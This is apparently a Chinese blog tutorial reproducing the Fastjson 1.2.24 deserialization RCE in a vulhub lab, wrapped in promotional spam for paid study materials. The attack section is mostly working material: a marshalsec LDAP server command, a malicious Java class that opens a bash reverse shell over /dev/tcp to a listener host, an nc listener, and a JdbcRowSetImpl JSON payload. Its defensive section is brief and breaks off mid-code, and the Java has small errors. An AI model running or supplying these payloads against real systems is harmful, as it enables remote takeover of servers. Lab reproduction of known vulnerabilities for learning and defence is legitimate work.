Fastjson反序列化漏洞原理与复现_fastjson反序化漏洞解决

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

需要体系化学习资料的朋友，可以加我V获取：vip204888 （备注网络安全）

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

fastjson版本<1.2.24 <1.2.27

序列化时会调用成员变量的get方法，私有成员变量不会被序列化。

反序列化时，会调用成员变量的set方法，public修饰的成员全部自动赋值。

2.1 环境搭建

vulhub靶场

#1 下载靶场
git clone https://github.com/vulhub/vulhub.git
cd vulhub/fastjson/1.2.24-rce
#2 编译，运行
docker-compose build
docker-compose up -d
#3 查看IP和端口
docker-compose ps
docker ps
#4 关闭靶场
docker-compose down

这里进入vulhub目录太慢了，而且路径也容易记错。可以篡改系统命令，添加命令别名。

vim ~/.bashrc
#在合适的位置添加如下语句
alias vulhub='cd /var/local/soft/vulhub;ls'
#保存并退出
source ~/.bashrc

靶机：centos 192.168.131.121

监听主机：Kali 192.168.131.134:9999

其他环境与Log4j相同——http://t.csdn.cn/l1xmR

2.2 测试

LDAP服务器中，执行如下代码

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.101.128:2222/#GetShell 1234

其中getshell是恶意类的类名，1234是监听的端口号，该工具可以启动JNDI或RMI接口。

当命令行显示Listening on 0.0.0.0:1234时表示服务开启成功。

构建一个恶意类GetShell.class

/\*
 \* getshell.java
 \* 将其编译后生成Exploit.class
 \* 上传到HTTP服务器
 \*/
public class GetShell{
    public GetShell(){
        Runtime.getRuntime.exec("bash -i >&/dev/tcp/192.168.101.134/9999 0>&1");//监听主机的IP和端口号
    }
    public static void main(Sring[] args){
        GetShell e = new GetShell();
    }
}
//直接使用静态代码块亦可

监听主机Kali开启监听：

nc -lvp 9999      # 9999是监听反弹shell的端口

这时，可以向靶场环境以POST的方式发送数据（payload）如下

POST /HTTP/1.1
Host:xxxxxxxx
...
Content-Type:application/json
Content-Length:146
{
	"x":{
		"@type":"com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName":"ldap://192.168.101.133:1234/GetShell",
		"autoCommit":true
	}
}

反弹shell成功即可。

2.3 过程分析

用到的反序列化方法

//返回实际类型的对象
Object returnObj = JSON.parseObject(serializedStr,returnObject.class);
//返回JsonObject对象
Object obj = JSON.parse(serializedStr);

//子类中包含接口或抽象类时，类型丢失
{"@type":"com.xxx.User","age":2,"flag":false,"name":"zhangsan"}

利用类

com.sun.rowset.JdbcRowSetImpl

使用时会引入一个dataSourceName支持传入一个rmi数据源，可以实现JNDI、LDAP端口注入攻击。

流程

序列化字符：准备类名、dataSourceName属性和autoCommit属性；

JdbcRowSetImpl反序列化，调用JdbcRowSetImpl的setAutoCommit()，setAutoCommit()调用connect()；

connect()调用lookup()链接到LDAP/RMI服务器，下载恶意代码到本地，执行攻击。

3 漏洞防御

3.1 排查方法

1. 找到发送JSON序列化数据的接口
2. 抓包判断是否使用fastjson
3. 传入不完整或错误的json数据，{“xx”:"查看返回的数据是否暴露
4. 使用dnslog ceye检测

package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
public class FastTest {


## 学习路线：

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)



**需要体系化学习资料的朋友，可以加我V获取：vip204888 （备注网络安全）**

**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**